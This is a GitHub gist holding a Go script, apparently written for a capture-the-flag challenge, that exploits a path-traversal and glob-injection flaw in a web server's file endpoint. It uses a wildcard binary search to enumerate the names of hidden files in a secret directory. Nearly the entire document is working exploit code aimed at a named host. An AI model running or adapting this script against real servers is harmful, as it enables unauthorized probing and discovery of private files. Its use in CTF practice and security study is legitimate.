Skip to content

Instantly share code, notes, and snippets.

@Acebond
Created May 19, 2021 12:08
Show Gist options
  • Save Acebond/6f655ce1bcb3251a6704bf6c62157af2 to your computer and use it in GitHub Desktop.
Save Acebond/6f655ce1bcb3251a6704bf6c62157af2 to your computer and use it in GitHub Desktop.
glob_search
package main
import (
"fmt"
"log"
"net/http"
"os"
"strings"
// "net/url"
)
var (
target = "ctf.shellz.club:8081"
path = "/file"
// /var/apache2/cgi-bin/
query = "name=../../.././../../../../../../INJECTION"
searchFolder = "/home/ctf/secret/"
searchSpace = "AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz.123456789%20_"
maxFileLength = 30
//errorResponse = []byte("That log file doesn't exist")
)
func formatURL(injection string) string {
URL := "http://" + target + path + "?" + query
URL = strings.Replace(URL, "INJECTION", searchFolder+injection, 1)
return URL
}
func isValidFile(filename string) bool {
URL := formatURL(filename)
resp, err := http.Get(URL)
if err != nil {
log.Panicln(err.Error())
}
//defer resp.Body.Close()
//respBody, _ := ioutil.ReadAll(resp.Body)
return resp.StatusCode == http.StatusOK
//return !bytes.Contains(respBody, errorResponse)
}
func binarySearchLetters(currentFilename string, searchSpace string, length int, results *[]string) {
if len(searchSpace) == 1 {
*results = append(*results, searchSpace)
return
}
split := len(searchSpace) / 2
pattern := ""
pattern = fmt.Sprintf("%s[%s]%s", currentFilename, searchSpace[:split], strings.Repeat("?", length-len(currentFilename)-1))
if isValidFile(pattern) {
binarySearchLetters(currentFilename, searchSpace[:split], length, results)
}
pattern = fmt.Sprintf("%s[%s]%s", currentFilename, searchSpace[split:], strings.Repeat("?", length-len(currentFilename)-1))
if isValidFile(pattern) {
binarySearchLetters(currentFilename, searchSpace[split:], length, results)
}
}
func findValidFiles(length int) []string {
log.Printf("Finding filenames with length: %d\n", length)
fileNames := []string{""}
tmpNames := []string{}
for i := 1; i <= length; i++ {
log.Println(fileNames)
for _, parshallName := range fileNames {
solutions := []string{}
binarySearchLetters(parshallName, searchSpace, length, &solutions)
//log.Printf("Solutions: %v\n", solutions)
for _, char := range solutions {
//fmt.Printf("Appending %s to tmpNames\n", parshallName + char)
tmpNames = append(tmpNames, parshallName+char)
}
}
fileNames = nil
fileNames = append(fileNames, tmpNames...)
tmpNames = nil
}
return fileNames
}
func findFiles() {
for len := 10; len < maxFileLength; len++ {
pattern := strings.Repeat("?", len)
if isValidFile(pattern) {
for _, filename := range findValidFiles(len) {
log.Printf("Found File: %s\n", filename)
}
}
}
}
func main() {
//flag.StringVar(&searchFolder, "path", "/var/apache2/html", "path to search")
//flag.Parse()
os.Setenv("HTTP_PROXY", "http://127.0.0.1:8080")
findFiles()
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment